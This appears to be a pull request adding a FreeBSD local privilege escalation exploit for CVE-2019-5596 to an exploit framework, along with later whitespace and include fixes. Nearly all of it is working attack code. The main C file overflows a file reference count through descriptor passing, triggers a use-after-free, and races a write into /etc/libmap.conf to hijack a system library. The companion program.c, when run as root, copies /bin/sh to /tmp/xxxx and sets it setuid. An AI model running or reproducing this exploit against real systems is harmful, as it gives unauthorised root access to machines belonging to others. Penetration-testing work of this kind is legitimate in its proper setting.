### PR TITLE
freebsd LPE (CVE-2019-5596)

### DIFF
--- a/data/exploits/CVE-2019-5596/heavy_cyber_weapon.c
+++ b/data/exploits/CVE-2019-5596/heavy_cyber_weapon.c
@@ -1,0 +1,621 @@
+#include <errno.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <pthread_np.h>
+#include <signal.h>
+#include <stdlib.h>
+#include <stdio.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/cpuset.h>
+#include <sys/event.h>
+#include <sys/ioctl.h>
+#include <sys/socket.h>
+#include <sys/stat.h>
+#include <sys/sysctl.h>
+#include <sys/types.h>
+#include <sys/un.h>
+
+#define N_FDS 0xfe
+#define N_OPEN 0x2
+
+#define N 1000000
+#define NUM_THREADS 400
+#define NUM_FORKS 3
+#define FILE_SIZE 1024
+#define CHUNK_SIZE 1
+#define N_FILES 25
+
+#define SERVER_PATH "/tmp/sync_forks"
+#define DEFAULT_PATH "/tmp/pwn"
+#define HAMMER_PATH "/tmp/pwn2"
+#define ATTACK_PATH "/etc/libmap.conf"
+
+#define HOOK_LIB "libutil.so.9"
+#define ATTACK_LIB "/tmp/libno_ex.so.1.0"
+
+#define CORE_0 0
+#define CORE_1 1
+
+#define MAX_TRIES 500
+
+struct thread_data {
+    int fd;
+    int fd2;
+};
+
+pthread_mutex_t write_mtx, trigger_mtx, count_mtx, hammer_mtx;
+pthread_cond_t write_cond, trigger_cond, count_cond, hammer_cond;
+
+int send_recv(int fd, int sv[2], int n_fds) {
+    int ret, i;
+    struct iovec iov;
+    struct msghdr msg;
+    struct cmsghdr *cmh;
+    char cmsg[CMSG_SPACE(sizeof(int)*n_fds)];
+    int *fds;    char buf[1];
+
+    iov.iov_base = "a";
+    iov.iov_len = 1;
+
+    msg.msg_name = NULL;
+    msg.msg_namelen = 0;
+    msg.msg_iov = &iov;
+    msg.msg_iovlen = 1;
+    msg.msg_control = cmsg;
+    msg.msg_controllen = CMSG_LEN(sizeof(int)*n_fds);
+    msg.msg_flags = 0;
+
+    cmh = CMSG_FIRSTHDR(&msg);
+    cmh->cmsg_len = CMSG_LEN(sizeof(int)*n_fds);
+    cmh->cmsg_level = SOL_SOCKET;
+    cmh->cmsg_type = SCM_RIGHTS;
+    fds = (int *)CMSG_DATA(cmsg);
+    for (i = 0; i < n_fds; i++) {
+	fds[i] = fd;
+    }
+
+    ret = sendmsg(sv[0], &msg, 0);
+    if (ret == -1) {
+	return 1;
+    }
+
+    iov.iov_base = buf;
+    msg.msg_name = NULL;
+    msg.msg_namelen = 0;
+    msg.msg_iov = &iov;
+    msg.msg_iovlen = 1;
+    msg.msg_control = cmh;
+    msg.msg_controllen = CMSG_SPACE(0);
+    msg.msg_flags = 0;
+
+    ret = recvmsg(sv[1], &msg, 0);
+    if (ret == -1) {
+	return 1;
+    }
+
+    return 0;
+}
+
+int open_tmp(char *path)
+{
+    int fd;
+    char *real_path;
+
+    if (path != NULL) {
+	real_path = malloc(strlen(path) + 1);
+	strcpy(real_path, path);
+    }
+    else {
+	real_path = malloc(strlen(DEFAULT_PATH) + 1);
+	strcpy(real_path, DEFAULT_PATH);
+    }
+
+    if ((fd = open(real_path, O_RDWR | O_CREAT)) == -1) {
+	perror("[!] open");
+	exit(1);
+    }
+
+    fchmod(fd, 0700);
+    
+    return fd;
+}
+
+void prepare_domain_socket(struct sockaddr_un *remote, char *path) {
+    bzero(remote, sizeof(struct sockaddr_un));
+    remote->sun_family = AF_UNIX;
+    strncpy(remote->sun_path, path, sizeof(remote->sun_path));
+}
+
+int bind_domain_socket(struct sockaddr_un *remote) {
+    int server_socket;
+    
+    if ((server_socket = socket(AF_UNIX, SOCK_DGRAM, 0)) == -1) {
+	perror("[!] socket");
+	exit(1);
+    }
+
+    if (bind(server_socket, 
+	     (struct sockaddr *) remote, 
+	     sizeof(struct sockaddr_un)) != 0) {
+	perror("[!] bind");
+	exit(1);
+    }
+
+    return server_socket;
+}
+
+int connect_domain_socket_client() {
+    int client_socket;
+    
+    if ((client_socket = socket(AF_UNIX, SOCK_DGRAM, 0)) == -1) {
+	perror("[!] socket");
+	exit(1);
+    }
+
+    return client_socket;
+}
+
+// Prevent panic at termination because f_count of the
+// corrupted struct file is 0 at the moment this function
+// is used but fd2 still points to the struct, hence fdrop()
+// is called at exit and will panic because f_count will
+// be below 0
+//
+// So we just use our known primitive to increase f_count
+void prevent_panic(int sv[2], int fd)
+{
+    send_recv(fd, sv, 0xfe);
+}
+
+int stick_thread_to_core(int core) {
+    /* int num_cores = sysconf(_SC_NPROCESSORS_ONLN); */
+    /* if (core_id < 0 || core_id >= num_cores) */
+    /* 	return EINVAL; */    
+    cpuset_t cpuset;
+    CPU_ZERO(&cpuset);
+    CPU_SET(core, &cpuset);
+    
+    pthread_t current_thread = pthread_self();    
+    return pthread_setaffinity_np(current_thread, sizeof(cpuset_t), &cpuset);
+}
+
+void *trigger_uaf(void *thread_args) {
+    struct thread_data *thread_data;
+    int fd, fd2;
+
+    if (stick_thread_to_core(CORE_0) != 0) {
+	perror("[!] [!] trigger_uaf: Could not stick thread to core");
+    }
+    
+    thread_data = (struct thread_data *)thread_args;
+    fd = thread_data->fd;
+    fd2 = thread_data->fd2;
+
+    printf("[+] trigger_uaf: fd: %d\n", fd);
+    printf("[+] trigger_uaf: fd2: %d\n", fd2);
+    
+    printf("[+] trigger_uaf: Waiting for start signal from monitor\n");
+    pthread_mutex_lock(&trigger_mtx);
+    pthread_cond_wait(&trigger_cond, &trigger_mtx);
+
+    usleep(40);
+    
+    // Close to fds to trigger uaf
+    //
+    // This assumes that fget_write() in kern_writev()
+    // was already successful!
+    //
+    // Otherwise kernel panic is triggered
+    //
+    // refcount = 2 (primitive+fget_write)
+    close(fd);
+    close(fd2);
+    // refcount = 0 => free
+    fd = open(ATTACK_PATH, O_RDONLY);
+    // refcount = 1
+
+    printf("[+] trigger_uaf: Opened read-only file, now hope\n");	
+    printf("[+] trigger_uaf: Exit\n");
+    
+    pthread_exit(NULL);
+}
+
+void *hammer(void *arg) {
+    int i, j, k, client_socket, ret;
+    char buf[FILE_SIZE], sync_buf[3];
+    FILE *fd[N_FILES];
+    struct sockaddr_un remote;
+
+    prepare_domain_socket(&remote, SERVER_PATH);
+    client_socket = connect_domain_socket_client();
+    strncpy(sync_buf, "1\n", 3);
+    
+    for (i = 0; i < N_FILES; i++) {
+	unlink(HAMMER_PATH);
+	if ((fd[i] = fopen(HAMMER_PATH, "w+")) == NULL) {
+	    perror("[!] fopen");
+	    exit(1);
+	}
+    }
+    
+    for (i = 0; i < FILE_SIZE; i++) {
+    	buf[i] = 'a';
+    }
+
+    pthread_mutex_lock(&hammer_mtx);
+
+    // Sometimes sendto() fails because
+    // no free buffer is available
+    for (;;) {
+	if (sendto(client_socket,
+		   sync_buf,
+		   strlen(sync_buf), 0,
+		   (struct sockaddr *) &remote,
+		   sizeof(remote)) != -1) {
+	    break;
+	}
+    }
+    
+    pthread_cond_wait(&hammer_cond, &hammer_mtx);
+    pthread_mutex_unlock(&hammer_mtx);
+    
+    for (i = 0; i < N; i++) {
+	for (k = 0; k < N_FILES; k++) {
+	    rewind(fd[k]);   
+	}
+	for (j = 0; j < FILE_SIZE*FILE_SIZE; j += CHUNK_SIZE) {
+	    for (k = 0; k < N_FILES; k++) {
+		if (fwrite(&buf[j % FILE_SIZE], sizeof(char), CHUNK_SIZE, fd[k]) < 0) {
+		    perror("[!] fwrite");
+		    exit(1);
+		}
+	    }
+	    fflush(NULL);
+	}
+    }
+    
+    pthread_exit(NULL);
+}
+
+// Works on UFS only
+void *monitor_dirty_buffers(void *arg) {
+    int hidirtybuffers, numdirtybuffers;
+    size_t len;
+
+    len = sizeof(int);
+    
+    if (sysctlbyname("vfs.hidirtybuffers", &hidirtybuffers, &len, NULL, 0) != 0) {
+	perror("[!] sysctlbyname hidirtybuffers");
+	exit(1);
+    };
+    printf("[+] monitor: vfs.hidirtybuffers: %d\n", hidirtybuffers);
+
+    while(1) {
+	sysctlbyname("vfs.numdirtybuffers", &numdirtybuffers, &len, NULL, 0);
+	if (numdirtybuffers >= hidirtybuffers) {
+	    pthread_cond_signal(&write_cond);
+	    pthread_cond_signal(&trigger_cond);		    
+	    printf("[+] monitor: Reached hidirtybuffers watermark\n");
+	    break;
+	}
+    }
+    
+    pthread_exit(NULL);
+}
+
+int check_write(int fd) {
+    char buf[256];
+    int nbytes;
+    struct stat st;
+
+    printf("[+] check_write\n");
+    stat(DEFAULT_PATH, &st);
+    printf("[+] %s size: %ld\n", DEFAULT_PATH, st.st_size);
+
+    stat(ATTACK_PATH, &st);
+    printf("[+] %s size: %ld\n", ATTACK_PATH, st.st_size);
+        
+    nbytes = read(fd, buf, strlen(HOOK_LIB));
+    printf("[+] Read bytes: %d\n", nbytes);
+    if (nbytes > 0 && strncmp(buf, HOOK_LIB, strlen(HOOK_LIB)) == 0) {
+	return 1;
+    }
+    else if (nbytes < 0) {
+	perror("[!] check_write:read");
+	printf("[!] check_write:Cannot check if it worked!");
+	return 1;
+    }
+    
+    return 0;
+}
+
+void *write_to_file(void *thread_args) {
+    int fd, fd2, nbytes;
+    int *fd_ptr;
+    char buf[256];
+    struct thread_data *thread_data;
+
+    if (stick_thread_to_core(CORE_1) != 0) {
+	perror("[!] write_to_file: Could not stick thread to core");
+    }
+    
+    fd_ptr = (int *) malloc(sizeof(int));
+    
+    thread_data = (struct thread_data *)thread_args;
+    fd = thread_data->fd;
+    fd2 = open(ATTACK_PATH, O_RDONLY);
+
+    printf("[+] write_to_file: Wait for signal from monitor\n");	
+    pthread_mutex_lock(&write_mtx);
+    pthread_cond_wait(&write_cond, &write_mtx);
+
+    snprintf(buf, 256, "%s %s\n#", HOOK_LIB, ATTACK_LIB);
+    nbytes = write(fd, buf, strlen(buf));
+
+    // Reopen directly after write to prevent panic later
+    //
+    // After the write f_count == 0 because after trigger_uaf()
+    // opened the read-only file, f_count == 1 and write()
+    // calls fdrop() at the end
+    //
+    // => f_count == 0
+    //
+    // A direct open hopefully assigns the now again free file
+    // object to fd so that we can prevent the panic with our
+    // increment primitive.
+    if ((fd = open_tmp(NULL)) == -1)
+	perror("[!] write_to_file: open_tmp");
+    *fd_ptr = fd;
+    
+    if (nbytes < 0) {
+	perror("[!] [!] write_to_file:write");
+    } else if (nbytes > 0) {
+	printf("[+] write_to_file: We have written something...\n");
+	if (check_write(fd2) > 0)
+	    printf("[+] write_to_file: It (probably) worked!\n");
+	else
+	    printf("[!] write_to_file: It worked not :(\n");
+    }
+
+    printf("[+] write_to_file: Exit\n");
+    pthread_exit(fd_ptr);
+}
+
+void prepare(int sv[2], int fds[2]) {
+    int fd, fd2, i;
+
+    printf("[+] Start UaF preparation\n");
+    printf("[+] This can take a while\n");
+	
+    // Get a single file descriptor to send via the socket
+    if ((fd = open_tmp(NULL)) == -1) {
+    	perror("[!] open_tmp");
+    	exit(1);
+    }
+    
+    if ((fd2 = dup(fd)) == -1) {
+	perror("[!] dup");
+	exit(1);
+    }
+    
+    // fp->f_count will increment by 0xfe in one iteration
+    // doing this 16909320 times will lead to
+    // f_count = 16909320 * 0xfe + 2 = 0xfffffff2
+    // Note the 2 because of the former call of dup() and
+    // the first open().
+    //
+    // To test our trigger we can send 0xd more fd's what
+    // would to an f_count of 0 when fdclose() is called in
+    // m_dispose_extcontrolm. fdrop() will reduce f_count to
+    // 0xffffffff = -1 and ultimately panic when _fdrop() is
+    // called because the latter asserts that f_count is 0.
+    // _fdrop is called in the first place because
+    // refcount_release() only checks that f_count is less or
+    // equal 1 to recognize the last reference.
+    //
+    // If we want to trigger the free without panic, we have
+    // to send 0xf fds and close an own what will lead to an
+    // fdrop() call without panic as f_count is 1 and reduced
+    // to 0 by close(). The unclosed descriptor references now
+    // a free 'struct file'.
+    for (i = 0; i < 16909320; i++) {
+    	if (i % 1690930 == 0) {
+    	    printf("[+] Progress: %d%%\n", (u_int32_t) (i / 169093));
+    	}
+	
+        if (send_recv(fd, sv, N_FDS)) {
+    	    perror("[!] prepare:send_recv");
+    	    exit(1);
+    	}
+    }
+    if (send_recv(fd, sv, 0xf)) {
+    	perror("[!] prepare:send_recv");
+    	exit(1);
+    }
+    
+    fds[0] = fd;
+    fds[1] = fd2;
+
+    printf("[+] Finished UaF preparation\n");
+}
+
+void read_thread_status(int server_socket) {
+    int bytes_rec, count;
+    struct sockaddr_un client;
+    socklen_t len;
+    char buf[256];
+    struct timeval tv;
+    
+    tv.tv_sec = 10;
+    tv.tv_usec = 0;
+    setsockopt(server_socket,
+	       SOL_SOCKET, SO_RCVTIMEO,
+	       (const char*)&tv, sizeof tv);
+    
+    for (count = 0; count < NUM_FORKS*NUM_THREADS; count++) {
+	if (count % 100 == 0) {
+	    printf("[+] Hammer threads ready: %d\n", count);
+	}
+	bzero(&client, sizeof(struct sockaddr_un));
+	bzero(buf, 256);
+	
+	len = sizeof(struct sockaddr_un);
+	if ((bytes_rec = recvfrom(server_socket,
+				  buf, 256, 0,
+				  (struct sockaddr *) &client,
+				  &len)) == -1) {
+	    perror("[!] recvfrom");
+	    break;
+	}
+    }
+
+    if (count != NUM_FORKS * NUM_THREADS) {
+	printf("[!] Could not create all hammer threads, will try though!\n");
+    }
+}
+
+void fire() {
+    int i, j, fd, fd2, bytes_rec, server_socket;
+    int sv[2], fds[2], hammer_socket[NUM_FORKS];
+    int *fd_ptr;
+    char socket_path[256], sync_buf[3], buf[256];
+    pthread_t write_thread, trigger_thread, monitor_thread;
+    pthread_t hammer_threads[NUM_THREADS];
+    pid_t pids[NUM_FORKS];
+    socklen_t len;
+    struct thread_data thread_data;
+    struct sockaddr_un server, client;
+    struct sockaddr_un hammer_socket_addr[NUM_FORKS];
+
+    // Socket for receiving thread status
+    unlink(SERVER_PATH);
+    prepare_domain_socket(&server, SERVER_PATH);
+    server_socket = bind_domain_socket(&server);
+
+    // Sockets to receive hammer signal
+    for (i = 0; i < NUM_FORKS; i++) {
+	snprintf(socket_path, sizeof(socket_path), "%s%c", SERVER_PATH, '1'+i);
+	unlink(socket_path);
+	prepare_domain_socket(&hammer_socket_addr[i], socket_path);
+	hammer_socket[i] = bind_domain_socket(&hammer_socket_addr[i]);
+    }
+
+    strncpy(sync_buf, "1\n", 3);
+    len = sizeof(struct sockaddr_un);
+    
+    if (socketpair(PF_UNIX, SOCK_STREAM, 0, sv) == -1) {
+	perror("[!] socketpair");
+	exit(1);
+    }
+        
+    pthread_mutex_init(&write_mtx, NULL);
+    pthread_mutex_init(&trigger_mtx, NULL);
+    pthread_cond_init(&write_cond, NULL);
+    pthread_cond_init(&trigger_cond, NULL);
+
+    pthread_create(&monitor_thread, NULL, monitor_dirty_buffers, NULL);
+
+    prepare(sv, fds);
+    fd = fds[0];
+    fd2 = fds[1];
+
+    thread_data.fd = fd;
+    thread_data.fd2 = fd2;
+    pthread_create(&trigger_thread, NULL, trigger_uaf, (void *) &thread_data);
+    pthread_create(&write_thread, NULL, write_to_file, (void *) &thread_data);
+    
+    for (j = 0; j < NUM_FORKS; j++) {
+	if ((pids[j] = fork()) < 0) {
+	    perror("[!] fork");
+	    abort();
+	}
+	else if (pids[j] == 0) {
+	    pthread_mutex_init(&hammer_mtx, NULL);
+	    pthread_cond_init(&hammer_cond, NULL);
+	    
+	    close(fd);
+	    close(fd2);
+
+	    /* Prevent that a file stream in the hammer threads
+             * gets the file descriptor of fd for debugging purposes
+	     */
+	    if ((fd = open_tmp("/tmp/dummy")) == -1)
+		perror("[!] dummy");
+	    if ((fd2 = open_tmp("/tmp/dummy2")) == -1)
+		perror("[!] dummy2");
+	    printf("[+] Fork %d fd: %d\n", j, fd);
+	    printf("[+] Fork %d fd2: %d\n", j, fd2);
+	    
+	    for (i = 0; i < NUM_THREADS; i++) {
+	    	pthread_create(&hammer_threads[i], NULL, hammer, NULL);
+	    }
+
+	    printf("[+] Fork %d created all threads\n", j);
+	    
+	    if ((bytes_rec = recvfrom(hammer_socket[j],
+				      buf, 256, 0,
+				      (struct sockaddr *) &client,
+				      &len)) == -1) {
+		perror("[!] accept");
+		abort();
+	    }
+
+	    pthread_cond_broadcast(&hammer_cond);
+	    
+	    for (i = 0; i < NUM_THREADS; i++) {
+	    	pthread_join(hammer_threads[i], NULL);
+	    }
+
+	    pthread_cond_destroy(&hammer_cond);
+	    pthread_mutex_destroy(&hammer_mtx);
+
+	    exit(0);
+	} else {
+	    printf("[+] Created child with PID %d\n", pids[j]);	    
+	}
+    }    
+
+    read_thread_status(server_socket);
+    printf("[+] Send signal to Start Hammering\n");
+    for (i = 0; i < NUM_FORKS; i++) {
+	if (sendto(hammer_socket[i],
+		   sync_buf,
+		   strlen(sync_buf), 0,
+		   (struct sockaddr *) &hammer_socket_addr[i],
+		   sizeof(hammer_socket_addr[0])) == -1) {
+	    perror("[!] sendto");
+	    exit(1);
+	}
+    }
+        
+    pthread_join(monitor_thread, NULL);
+    for (i = 0; i < NUM_FORKS; i++) {
+	kill(pids[i], SIGKILL);
+	printf("[+] Killed %d\n", pids[i]);
+    }
+
+    pthread_join(write_thread, (void **) &fd_ptr);    
+    pthread_join(trigger_thread, NULL);
+    
+    pthread_mutex_destroy(&write_mtx);
+    pthread_mutex_destroy(&trigger_mtx);
+    pthread_cond_destroy(&write_cond);
+    pthread_cond_destroy(&trigger_cond);
+
+    printf("[+] Returned fd: %d\n", *fd_ptr);
+    prevent_panic(sv, *fd_ptr);
+
+    // fd was acquired from write_to_file
+    // which allocs a pointer for it
+    free(fd_ptr);
+}
+
+int main(int argc, char **argv)
+{
+    setbuf(stdout, NULL);
+    
+    fire();
+
+    return 0;
+}

--- a/data/exploits/CVE-2019-5596/heavy_cyber_weapon.c
+++ b/data/exploits/CVE-2019-5596/heavy_cyber_weapon.c
@@ -15,6 +15,7 @@
 #include <sys/sysctl.h>
 #include <sys/types.h>
 #include <sys/un.h>
+#include <libutil.h>
 
 #define N_FDS 0xfe
 #define N_OPEN 0x2
@@ -117,7 +118,7 @@ int open_tmp(char *path)
     }
 
     fchmod(fd, 0700);
-    
+
     return fd;
 }
 
@@ -129,14 +130,14 @@ void prepare_domain_socket(struct sockaddr_un *remote, char *path) {
 
 int bind_domain_socket(struct sockaddr_un *remote) {
     int server_socket;
-    
+
     if ((server_socket = socket(AF_UNIX, SOCK_DGRAM, 0)) == -1) {
 	perror("[!] socket");
 	exit(1);
     }
 
-    if (bind(server_socket, 
-	     (struct sockaddr *) remote, 
+    if (bind(server_socket,
+	     (struct sockaddr *) remote,
 	     sizeof(struct sockaddr_un)) != 0) {
 	perror("[!] bind");
 	exit(1);
@@ -147,7 +148,7 @@ int bind_domain_socket(struct sockaddr_un *remote) {
 
 int connect_domain_socket_client() {
     int client_socket;
-    
+
     if ((client_socket = socket(AF_UNIX, SOCK_DGRAM, 0)) == -1) {
 	perror("[!] socket");
 	exit(1);
@@ -171,12 +172,12 @@ void prevent_panic(int sv[2], int fd)
 int stick_thread_to_core(int core) {
     /* int num_cores = sysconf(_SC_NPROCESSORS_ONLN); */
     /* if (core_id < 0 || core_id >= num_cores) */
-    /* 	return EINVAL; */    
+    /* 	return EINVAL; */
     cpuset_t cpuset;
     CPU_ZERO(&cpuset);
     CPU_SET(core, &cpuset);
-    
-    pthread_t current_thread = pthread_self();    
+
+    pthread_t current_thread = pthread_self();
     return pthread_setaffinity_np(current_thread, sizeof(cpuset_t), &cpuset);
 }
 
@@ -187,20 +188,20 @@ void *trigger_uaf(void *thread_args) {
     if (stick_thread_to_core(CORE_0) != 0) {
 	perror("[!] [!] trigger_uaf: Could not stick thread to core");
     }
-    
+
     thread_data = (struct thread_data *)thread_args;
     fd = thread_data->fd;
     fd2 = thread_data->fd2;
 
     printf("[+] trigger_uaf: fd: %d\n", fd);
     printf("[+] trigger_uaf: fd2: %d\n", fd2);
-    
+
     printf("[+] trigger_uaf: Waiting for start signal from monitor\n");
     pthread_mutex_lock(&trigger_mtx);
     pthread_cond_wait(&trigger_cond, &trigger_mtx);
 
     usleep(40);
-    
+
     // Close to fds to trigger uaf
     //
     // This assumes that fget_write() in kern_writev()
@@ -215,9 +216,9 @@ void *trigger_uaf(void *thread_args) {
     fd = open(ATTACK_PATH, O_RDONLY);
     // refcount = 1
 
-    printf("[+] trigger_uaf: Opened read-only file, now hope\n");	
+    printf("[+] trigger_uaf: Opened read-only file, now hope\n");
     printf("[+] trigger_uaf: Exit\n");
-    
+
     pthread_exit(NULL);
 }
 
@@ -230,7 +231,7 @@ void *hammer(void *arg) {
     prepare_domain_socket(&remote, SERVER_PATH);
     client_socket = connect_domain_socket_client();
     strncpy(sync_buf, "1\n", 3);
-    
+
     for (i = 0; i < N_FILES; i++) {
 	unlink(HAMMER_PATH);
 	if ((fd[i] = fopen(HAMMER_PATH, "w+")) == NULL) {
@@ -238,7 +239,7 @@ void *hammer(void *arg) {
 	    exit(1);
 	}
     }
-    
+
     for (i = 0; i < FILE_SIZE; i++) {
     	buf[i] = 'a';
     }
@@ -256,13 +257,13 @@ void *hammer(void *arg) {
 	    break;
 	}
     }
-    
+
     pthread_cond_wait(&hammer_cond, &hammer_mtx);
     pthread_mutex_unlock(&hammer_mtx);
-    
+
     for (i = 0; i < N; i++) {
 	for (k = 0; k < N_FILES; k++) {
-	    rewind(fd[k]);   
+	    rewind(fd[k]);
 	}
 	for (j = 0; j < FILE_SIZE*FILE_SIZE; j += CHUNK_SIZE) {
 	    for (k = 0; k < N_FILES; k++) {
@@ -274,7 +275,7 @@ void *hammer(void *arg) {
 	    fflush(NULL);
 	}
     }
-    
+
     pthread_exit(NULL);
 }
 
@@ -284,7 +285,7 @@ void *monitor_dirty_buffers(void *arg) {
     size_t len;
 
     len = sizeof(int);
-    
+
     if (sysctlbyname("vfs.hidirtybuffers", &hidirtybuffers, &len, NULL, 0) != 0) {
 	perror("[!] sysctlbyname hidirtybuffers");
 	exit(1);
@@ -295,12 +296,12 @@ void *monitor_dirty_buffers(void *arg) {
 	sysctlbyname("vfs.numdirtybuffers", &numdirtybuffers, &len, NULL, 0);
 	if (numdirtybuffers >= hidirtybuffers) {
 	    pthread_cond_signal(&write_cond);
-	    pthread_cond_signal(&trigger_cond);		    
+	    pthread_cond_signal(&trigger_cond);
 	    printf("[+] monitor: Reached hidirtybuffers watermark\n");
 	    break;
 	}
     }
-    
+
     pthread_exit(NULL);
 }
 
@@ -315,7 +316,7 @@ int check_write(int fd) {
 
     stat(ATTACK_PATH, &st);
     printf("[+] %s size: %ld\n", ATTACK_PATH, st.st_size);
-        
+
     nbytes = read(fd, buf, strlen(HOOK_LIB));
     printf("[+] Read bytes: %d\n", nbytes);
     if (nbytes > 0 && strncmp(buf, HOOK_LIB, strlen(HOOK_LIB)) == 0) {
@@ -326,7 +327,7 @@ int check_write(int fd) {
 	printf("[!] check_write:Cannot check if it worked!");
 	return 1;
     }
-    
+
     return 0;
 }
 
@@ -339,14 +340,14 @@ void *write_to_file(void *thread_args) {
     if (stick_thread_to_core(CORE_1) != 0) {
 	perror("[!] write_to_file: Could not stick thread to core");
     }
-    
+
     fd_ptr = (int *) malloc(sizeof(int));
-    
+
     thread_data = (struct thread_data *)thread_args;
     fd = thread_data->fd;
     fd2 = open(ATTACK_PATH, O_RDONLY);
 
-    printf("[+] write_to_file: Wait for signal from monitor\n");	
+    printf("[+] write_to_file: Wait for signal from monitor\n");
     pthread_mutex_lock(&write_mtx);
     pthread_cond_wait(&write_cond, &write_mtx);
 
@@ -367,7 +368,7 @@ void *write_to_file(void *thread_args) {
     if ((fd = open_tmp(NULL)) == -1)
 	perror("[!] write_to_file: open_tmp");
     *fd_ptr = fd;
-    
+
     if (nbytes < 0) {
 	perror("[!] [!] write_to_file:write");
     } else if (nbytes > 0) {
@@ -387,18 +388,18 @@ void prepare(int sv[2], int fds[2]) {
 
     printf("[+] Start UaF preparation\n");
     printf("[+] This can take a while\n");
-	
+
     // Get a single file descriptor to send via the socket
     if ((fd = open_tmp(NULL)) == -1) {
     	perror("[!] open_tmp");
     	exit(1);
     }
-    
+
     if ((fd2 = dup(fd)) == -1) {
 	perror("[!] dup");
 	exit(1);
     }
-    
+
     // fp->f_count will increment by 0xfe in one iteration
     // doing this 16909320 times will lead to
     // f_count = 16909320 * 0xfe + 2 = 0xfffffff2
@@ -423,7 +424,7 @@ void prepare(int sv[2], int fds[2]) {
     	if (i % 1690930 == 0) {
     	    printf("[+] Progress: %d%%\n", (u_int32_t) (i / 169093));
     	}
-	
+
         if (send_recv(fd, sv, N_FDS)) {
     	    perror("[!] prepare:send_recv");
     	    exit(1);
@@ -433,7 +434,7 @@ void prepare(int sv[2], int fds[2]) {
     	perror("[!] prepare:send_recv");
     	exit(1);
     }
-    
+
     fds[0] = fd;
     fds[1] = fd2;
 
@@ -446,20 +447,20 @@ void read_thread_status(int server_socket) {
     socklen_t len;
     char buf[256];
     struct timeval tv;
-    
+
     tv.tv_sec = 10;
     tv.tv_usec = 0;
     setsockopt(server_socket,
 	       SOL_SOCKET, SO_RCVTIMEO,
 	       (const char*)&tv, sizeof tv);
-    
+
     for (count = 0; count < NUM_FORKS*NUM_THREADS; count++) {
 	if (count % 100 == 0) {
 	    printf("[+] Hammer threads ready: %d\n", count);
 	}
 	bzero(&client, sizeof(struct sockaddr_un));
 	bzero(buf, 256);
-	
+
 	len = sizeof(struct sockaddr_un);
 	if ((bytes_rec = recvfrom(server_socket,
 				  buf, 256, 0,
@@ -503,12 +504,12 @@ void fire() {
 
     strncpy(sync_buf, "1\n", 3);
     len = sizeof(struct sockaddr_un);
-    
+
     if (socketpair(PF_UNIX, SOCK_STREAM, 0, sv) == -1) {
 	perror("[!] socketpair");
 	exit(1);
     }
-        
+
     pthread_mutex_init(&write_mtx, NULL);
     pthread_mutex_init(&trigger_mtx, NULL);
     pthread_cond_init(&write_cond, NULL);
@@ -524,7 +525,7 @@ void fire() {
     thread_data.fd2 = fd2;
     pthread_create(&trigger_thread, NULL, trigger_uaf, (void *) &thread_data);
     pthread_create(&write_thread, NULL, write_to_file, (void *) &thread_data);
-    
+
     for (j = 0; j < NUM_FORKS; j++) {
 	if ((pids[j] = fork()) < 0) {
 	    perror("[!] fork");
@@ -533,7 +534,7 @@ void fire() {
 	else if (pids[j] == 0) {
 	    pthread_mutex_init(&hammer_mtx, NULL);
 	    pthread_cond_init(&hammer_cond, NULL);
-	    
+
 	    close(fd);
 	    close(fd2);
 
@@ -546,13 +547,13 @@ void fire() {
 		perror("[!] dummy2");
 	    printf("[+] Fork %d fd: %d\n", j, fd);
 	    printf("[+] Fork %d fd2: %d\n", j, fd2);
-	    
+
 	    for (i = 0; i < NUM_THREADS; i++) {
 	    	pthread_create(&hammer_threads[i], NULL, hammer, NULL);
 	    }
 
 	    printf("[+] Fork %d created all threads\n", j);
-	    
+
 	    if ((bytes_rec = recvfrom(hammer_socket[j],
 				      buf, 256, 0,
 				      (struct sockaddr *) &client,
@@ -562,7 +563,7 @@ void fire() {
 	    }
 
 	    pthread_cond_broadcast(&hammer_cond);
-	    
+
 	    for (i = 0; i < NUM_THREADS; i++) {
 	    	pthread_join(hammer_threads[i], NULL);
 	    }
@@ -572,9 +573,9 @@ void fire() {
 
 	    exit(0);
 	} else {
-	    printf("[+] Created child with PID %d\n", pids[j]);	    
+	    printf("[+] Created child with PID %d\n", pids[j]);
 	}
-    }    
+    }
 
     read_thread_status(server_socket);
     printf("[+] Send signal to Start Hammering\n");
@@ -588,16 +589,16 @@ void fire() {
 	    exit(1);
 	}
     }
-        
+
     pthread_join(monitor_thread, NULL);
     for (i = 0; i < NUM_FORKS; i++) {
 	kill(pids[i], SIGKILL);
 	printf("[+] Killed %d\n", pids[i]);
     }
 
-    pthread_join(write_thread, (void **) &fd_ptr);    
+    pthread_join(write_thread, (void **) &fd_ptr);
     pthread_join(trigger_thread, NULL);
-    
+
     pthread_mutex_destroy(&write_mtx);
     pthread_mutex_destroy(&trigger_mtx);
     pthread_cond_destroy(&write_cond);
@@ -614,7 +615,7 @@ void fire() {
 int main(int argc, char **argv)
 {
     setbuf(stdout, NULL);
-    
+
     fire();
 
     return 0;

--- a/data/exploits/CVE-2019-5596/program.c
+++ b/data/exploits/CVE-2019-5596/program.c
@@ -2,10 +2,11 @@
 #include <stdio.h>
 #include <sys/types.h>
 #include <stdlib.h>
+#include <libutil.h>
 
 void _init()
 {
   if (!geteuid())
-    //execl("/bin/sh","sh","-c","/bin/cp /bin/sh /tmp/xxxx ; /bin/chmod +xs /tmp/xxxx",NULL);
-    execl("/bin/sh","sh","-c","/bin/chmod +xs /tmp/xxxx",NULL);
+    execl("/bin/sh","sh","-c","/bin/cp /bin/sh /tmp/xxxx ; /bin/chmod +xs /tmp/xxxx",NULL);
+    //execl("/bin/sh","sh","-c","/bin/chmod +xs /tmp/xxxx",NULL);
 }

--- a/data/exploits/CVE-2019-5596/program.c
+++ b/data/exploits/CVE-2019-5596/program.c
@@ -8,5 +8,4 @@ void _init()
 {
   if (!geteuid())
     execl("/bin/sh","sh","-c","/bin/cp /bin/sh /tmp/xxxx ; /bin/chmod +xs /tmp/xxxx",NULL);
-    //execl("/bin/sh","sh","-c","/bin/chmod +xs /tmp/xxxx",NULL);
 }

--- a/data/exploits/CVE-2019-5596/program.c
+++ b/data/exploits/CVE-2019-5596/program.c
@@ -1,0 +1,11 @@
+#include <unistd.h>
+#include <stdio.h>
+#include <sys/types.h>
+#include <stdlib.h>
+
+void _init()
+{
+  if (!geteuid())
+    //execl("/bin/sh","sh","-c","/bin/cp /bin/sh /tmp/xxxx ; /bin/chmod +xs /tmp/xxxx",NULL);
+    execl("/bin/sh","sh","-c","/bin/chmod +xs /tmp/xxxx",NULL);
+}

